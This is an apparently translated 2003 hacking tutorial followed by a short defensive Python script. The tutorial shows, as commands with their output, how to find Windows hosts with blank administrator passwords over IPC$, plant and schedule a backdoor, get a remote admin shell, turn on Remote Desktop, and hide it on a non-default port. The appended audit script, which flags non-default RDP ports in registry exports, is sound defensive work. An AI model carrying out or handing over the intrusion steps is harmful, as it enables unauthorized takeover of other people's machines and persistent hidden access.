            From ip to opening 3389 to making 3389 serve you
            www.cshu.net  2003-3-1  fog rain village 

              How to go from an ip to opening 3389, and finally to making 
              3389 serve you! 
              Tools: 
              Time 4.7 (http://www.heibai.net/download/show.php?Id=2277&down=1) 
              Wollf v1.6 (http://www.heibai.net/download/show.php?Id=2996&down=1) 
              HBULOT (http://www.heibai.net/download/show.php?Id=2951&down=1) 
              Local platform: 2000/NT 
              Target platform: 2000/NT 
              All of the tools above can be found on Heibai; how each one is 
              used is introduced in the article. 
              First open Time (if you have never even heard of Time, I don't 
              think you need to read this article), press Ctrl+A, fill in an 
              ip range, and choose the IPC scan. One of the results: 
              218.22.155.* (SERVER) 
              -------------------------------------------------------------------------------- 

              IPC scanning 
              Share list obtained 
              G f e h I 
              User list obtained 
              02,912 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser 
              Successfully guessed user account Administrator (Admin): (NULL) 
              I picked one at random for the experiment. First, connect over 
              ip. 
              ========================================================================================== 

              C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ip "" /user:administrator 
              ---------------- connected successfully! 
              The command completed successfully. 
              C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admin$ 
              ---------------- copies wollf.exe to the target computer's admin$ directory 
              1 file(s) copied. 
              C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\admin$ 
              ---------------- copies hbulot.exe to the target computer's admin$ directory 
              1 file(s) copied. 
              C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.* 
              Current time at \\218.22.155.* is 200.2/12/1 million morning 06:37 
              The command completed successfully. 
              C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe 
              Added a new job with job ID = 1 
              ---------------- schedules wollf.exe to run at 06:39 
              ------------------------------------------------------------------------------------------ 

              Explanation: 
              Wollf.exe is a backdoor program. Many experts prefer nc or 
              winshell, but it is the only one I care for! This article only 
              introduces the command parameters that are relevant here; its 
              advanced usage is not covered. 
              Hbulot.exe is used to enable the 3389 service. If the target is 
              not the Server edition or above, there is no point running it, 
              because the Pro edition cannot install the terminal service. 
              After 2 minutes...... 
              ========================================================================================== 

              C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614 
              "Wollf Remote Manager" v1.6 
              Code by wollf, http://www.xfocus.org 
              ------------------------------------------------------------------------------------------ 

              Explanation: 
              When connecting with wollf, make sure wollf.exe is in the 
              current directory. The format of the connection command is: 
              wollf -connect IP 7614 
              7614 is the port that wollf opens. If the output looks like the 
              above, you have connected successfully and have administrator 
              privileges. 
              ========================================================================================== 

              [server@D:\WINNT\system32]#dos 
              Microsoft Windows 2000 [Version 5.00.2195] 
              (C) Copyright 1985-2000 Microsoft Corp. 
              ------------------------------------------------------------------------------------------ 

              Explanation: 
              Enter dos to get a cmd prompt on the target machine, again with 
              administrator privileges. 
              ========================================================================================== 

              D:\WINNT\system32>cd.. 
              cd.. 
              D:\WINNT>dir h*.* 
              dir h*.* 
              Volume in drive D has no label. 
              Volume Serial Number is 1CE5-2615 
              Directory of D:\WINNT 
              2002-11-27 03:07 <DIR> Help 
              2002-09-10 12:16 10,752 hh.exe 
              2002-10-01 08:29 24,576 HBULOT.exe 
              2 File(s) 35,328 bytes 
              1 Dir(s) 9,049,604,096 bytes free 
              D:\WINNT>hbulot 
              hbulot 
              ------------------------------------------------------------------------------------------ 

              Explanation: 
              Because we put HBULOT.exe into the target machine's admin$, we 
              find it first; the listing above shows where the file is stored. 
              ========================================================================================== 

              D:\WINNT>exit 
              exit 
              Command "DOS" succeed. 
              [server@D:\WINNT\system32]#reboot 

              Command "REBOOT" succeed. 
              [server@D:\WINNT\system32]# 
              Connection closed. 
              ------------------------------------------------------------------------------------------ 

              Explanation: 
              Use exit to leave dos and return to the wollf command mode. 
              HBULOT.exe only takes effect after a restart; wollf has its own 
              REBOOT command, and once it is executed you lose the connection 
              after 5 seconds. When the restart has finished, check whether 
              port 3389 is open. There are many ways to do this, for example a 
              superscan3 scan. At this point you can log in. If 3389 has not 
              opened, the target is not the Server edition or above and there 
              was no point running it, because the Pro edition cannot install 
              the terminal service. 
              At this point you have a 3389 "meat chicken" (a compromised 
              host)! But can it be discovered by other intruders? Below I 
              show how to make 3389 serve you! 
              There are currently two versions of the 3389 login client: one 
              for 2000/98 and one for XP. The difference? The former uses the 
              default port 3389 for the target; the latter also defaults to 
              port 3389, but it supports connecting on other ports as well! 
              Therefore..... we change the 3389 connection port so that it is 
              hidden from ordinary scanners! The method is as follows: 
              To change the server-side port setting, two places in the 
              registry need to be modified. 
              [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 
              The PortNumber value defaults to 3389; change it to the port 
              you want, for instance 1314. 
              Second place: 
              [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
              The PortNumber value defaults to 3389; change it to the port 
              you want, for instance 1314. 
              That is all. Restart the system. 
              Note: in fact, changing only the second one also works. 
              Moreover, the general form of the second key is 
              [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>] 
              where <connection> stands for a specific RDP-Tcp connection. 
              After the restart, check whether the port has changed. 
              Small tip: when editing the registry value, first select 
              decimal and enter the port value you want, then select 
              hexadecimal; the system converts it automatically. 
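
For defenders, the port change described above is caught by auditing the same two registry locations instead of relying on a scan for 3389. The following is an added example, not part of the original article: it parses the text of a .reg export of the Terminal Server key and reports every PortNumber that is not 3389; the function name and the sample export are constructed for illustration.

```python
import re

DEFAULT_RDP_PORT = 3389
TS_ROOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
# The two locations the article names: the Wds transport key and
# WinStations\<connection> (any connection name, not only RDP-Tcp).
WATCHED = re.compile(
    re.escape(TS_ROOT) + r"\\(Wds\\rdpwd\\Tds\\tcp|WinStations\\[^\\]+)",
    re.IGNORECASE,
)
PORT_VALUE = re.compile(r'"PortNumber"=dword:([0-9a-f]{8})', re.IGNORECASE)

# Constructed sample: text of a .reg export (decode UTF-16 exports first).
# Only the second key was changed, the case the article says is sufficient.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000d3d

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"fEnableWinStation"=dword:00000001
"PortNumber"=dword:00000522
"""

def audit_rdp_ports(reg_text):
    """Return [(key, port)] for watched keys whose PortNumber is not 3389."""
    findings, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            # New key section: track it only if it is one we watch.
            key = line[1:-1] if WATCHED.fullmatch(line[1:-1]) else None
        elif key:
            m = PORT_VALUE.fullmatch(line)
            if m:
                port = int(m.group(1), 16)  # .reg files store DWORDs in hex
                if port != DEFAULT_RDP_PORT:
                    findings.append((key, port))
    return findings

if __name__ == "__main__":
    for key, port in audit_rdp_ports(SAMPLE_REG):
        print(f"non-default RDP port {port} in {key}")
```

A check that reads only the Wds key would miss the sample above, which is why every WinStations connection is inspected as well.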


              Original author: -> cat <- love 
              Origin: Heibai.net 